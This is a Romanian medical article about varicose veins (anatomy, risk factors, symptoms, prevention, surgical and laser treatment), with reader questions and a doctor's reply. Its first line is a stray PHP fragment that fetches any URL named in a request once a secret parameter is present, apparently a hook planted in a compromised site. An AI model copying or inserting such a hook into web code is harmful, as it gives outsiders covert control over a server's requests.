isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Varice - MedicAS

varice

Boalavaricoasă este boala cea mai frecventă a venelor şi se caracterizează prin dilatări segmentare pe trunchiuri venoase mai mari sau cu aspect reticulat la venele mai mici. Înainte de a discuta despre varice, este important să prezentăm schematic câteva date referitoare la circulaţia sângelui venos la nivelul membrelor inferioare.

Sângele membrelor inferioare este colectat prin două sisteme venoase - sistemul venos profund şi sistemul venos superficial. Sistemul venos profund drenează sângele provenind din circulaţia aferentă structurilor osteoarticulare şi musculaturii coapsei şi gambei, în timp ce sistemul venos superficial ”colectează” doar sângele provenind din pielea şi grăsimea ce ocupă spaţiul situat deasupra muşchilor.

Deşi aceste sisteme sunt separate printr-un plan fascial profund, ce îmbracă toată musculatura membrelor inferioare, între ele există legături prin vene comunicante, ce perforează această fascie. La rădăcina coapsei, în regiunea inghinală, sistemul venos superficial se uneşte cu cel profund, formând un trunchi venos unic, ce drenează tot sângele membrului inferior. Sensul unic de circulaţie al sângelui este de jos în sus şi de la suprafaţă spre profunzime, adică dinspre sistemul venos superficial spre cel profund. Aceasta se poate realiza graţie valvelor unidirecţionale care se găsesc în interiorul venelor profunde, a celor superficiale şi a comunicantelor dintre ele.

În momentul în care aceste valve devin incompetente, sângele cu presiunea mai ridicată din sistemul venos profund pătrunde în sistemul venos superficial, determinând staza şi dilatarea venelor superficiale. Valvele unidirecţionale pot deveni incompetente fie prin deteriorarea calităţii lor, în cadrul unor procese degenerative, fie prin forţarea lor de către o coloană de sânge cu presiuni mult prea mari.

Varicele sunt reprezentate tocmai de aceste vene dilatate, aparţinând sistemului venos superficial. Boala varicoasă este mai frecventă la femei, 60% dintre acestea prezentând semnele bolii, la vârste cuprinse între 20 şi 50 ani.Deşi nu se cunoaşte modul în care se transmite, factorul genetic a fost prezent în peste 80% din cazuri.

Varice - factori favorizanţi:

- o profesiune care impune statul prelungit în picioare (la profesori, frizeri, vânzători, stomatologi)

- efortul muscular intens şi prelungit (halterofili) sau trepidaţiile

- căldura şi umiditatea excesivă, favorizează apariţia varicelor

- obezitatea, pe lânga plusul de greutate ce apasă asupra membrelor inferioare, prin tulburările neuro-endocrine şi metabolice pe care le implică, adânceşte leziunile distrofice ale peretelui venos

- sarcina reprezintă un proces biologic normal, menţinerea ei este realizată cu eforturi inimaginabile din partea organismului matern

În evoluţia bolii varicoase distingem două etape: de debut (prevaricoasă) şi stadiul de varice constituite.

Varice - cum se manifestă?

Debutul este lent, manifestat prin fenomene subiective în special la nivelul gambelor: o senzaţie de nelinişte (care îndeamnă bolnavul să meargă sau să-şi maseze gamba), discrete amorţeli şi o senzaţie de greutate a gambei, fenomene care apar după stat prelungit în picioare, eforturi intense sau o poziţie sezândă îndelungată şi dispar în poziţie culcată, cu picioarele uşor ridicate faţă de planul corpului. Pot apare şi semne obiective ca cianoza porţiunii inferioare a gambelor, însoţită de un edem discret la acest nivel.

În stadiul de varice constituite, se observă “coloane” venoase dilatate, cu traseu sinuos, şerpuitor, care apar iniţial în porţiunea superioară a gambei. La compresiunile mai importante, apărute în micul bazin, în special în a doua parte a sarcinii, se pot dezvolta şi varice în regiunea organelor genitale externe, varice vulvo-vaginale, impresionante pentru o pacientă neavizată. Acestea sunt prezente doar pe timpul sarcinii, ele regresând în totalitate, la majoritatea cazurilor, dupa naştere.

Edemul, care iniţial era discret, dispărând dimineaţa, se extinde în suprafaţă şi profunzime, devenind permanent, odată cu instalarea insuficienţei venoase cronice. Tegumentele vor fi subţiate, transparente, lucioase, cu zone de hiperpigmentare, eczematoase, cu pilozitate redusă şi foarte sensibile la traumatisme, chiar de intensitate foarte redusă. Varicele netratate pot evolua cu dezvoltarea unor complicaţii cum sunt: ulceraţia de gambă, ruptura varicelor cu hemoragia consecutivă şi tromboflebita.

Varice - măsuri profilactice:

 • evitarea ortostatismului prelungit (statul în picioare fără mişcare cu contractura musculară a membrelor inferioare)
 • evitarea expunerii prelungite la soare
 • din primele luni de sarcină, este indicat ca viitoarea mamă să poarte ciorapi elastici, pe toată lungimea membrelor inferioare. Aceşti ciorapi vor fi traşi dimineaţa, înainte de a coborî din pat şi vor fi purtaţi, pe cât posibil, în tot cursul zilei
 • o atenţie deosebită va fi acordată regimului alimentar, care, pe lângă asigurarea unui aport caloric şi vitamino-mineral corespunzator, va trebui să prevină constipaţia şi , printr-o dietă bogată în legume şi fructe. Dacă este cazul, pentru reglarea tranzitului intestinal, vor fi folosite şi ceaiuri laxative sau supozitoare cu glicerină
 • încurajarea activităţilor sportive uşoare, inclusiv înotul sau mersul pe jos, este întotdeuna benefică

Varice - tratament curativ:

Are o paletă de elemente ce pot fi folosite în diferite combinaţii, pentru obţinerea unor efecte morfologice, funcţionale şi nu în ultimul rând estetice optime. Acestea includ extirparea pachetelor varicoase prin tehnici microchirurgicale, cu incizii ce devin la câteva luni practic invizibile, laserterapia şi scleroterapia.

La pacienţii tineri este recomandată evitarea pe cât posibil a extirpării în totalitate a venei safene (clasica smulgere venoasă), aceasta constituind, în unele cazuri de urgenţă, un rezervor natural de proteză vasculară biologică. În cazurile evoluate, numai un medic chirurg cu experienţă în chirurgia vasculară şi în acelaşi timp cu temeinice cunoştinţe de chirurgie plastică, poate oferi soluţia terapeutică salvatoare.

Dr. Ciprian Duţă
Medic primar chirurg


Cuvinte relevante: , , ,


Articole asemănătoare:

4 Răspunsuri la “Despre varice şi profilaxia lor”


 1. brigita :

  buna!ma numesc brigita.as avea si eu o intrebare,mama mea are 43 de ani si de cand ma stiu are varice si arata foarte rau,nu am mai azut la nimeni asa,am incercat sa o conving sa mearga la medic da ii este frica,ce se poate intampla daca nu merge la medic?


 2. Dr. Anca Sava :

  Ceau Brigita. Exista mai multe complicatii ale varicelor, intre ele fiind dermatitele, ulcerul varicos, tromboza venoasa, fistula cutanată. Mama ta este tanara si, pe langa aspectul inestetic care exista deja, pot aparea si complicatiile de mai sus. Nu are de sa se teama sa mearga la un consult, mai ales ca acum sunt metode moderne de rezolvarea a varicelor.
  Iti doresc putere de convingere mai mare si mamei tale sanatate.


 3. Nicoleta :

  Buna,ma numesc Nicoleta,am 23ani si sunt insarcinata in luna a-7-a,de 3 saptamani mi.a aparut varice genitale,sunt super ingrijorata.DR.mi-a recomandat repauz total la pat pana la sfarsitul sarcini.Spuneti-mi va rog daca aceasta problema m-ar inpedica la o nastere normala?Va multumesc.


 4. pop anuta :

  buna ziua, am 49 ani si am varice esofagiene si rectale. as dori un tratament naturistAdaugă un comentariu


 
 

Newsletter

Loading... Loading...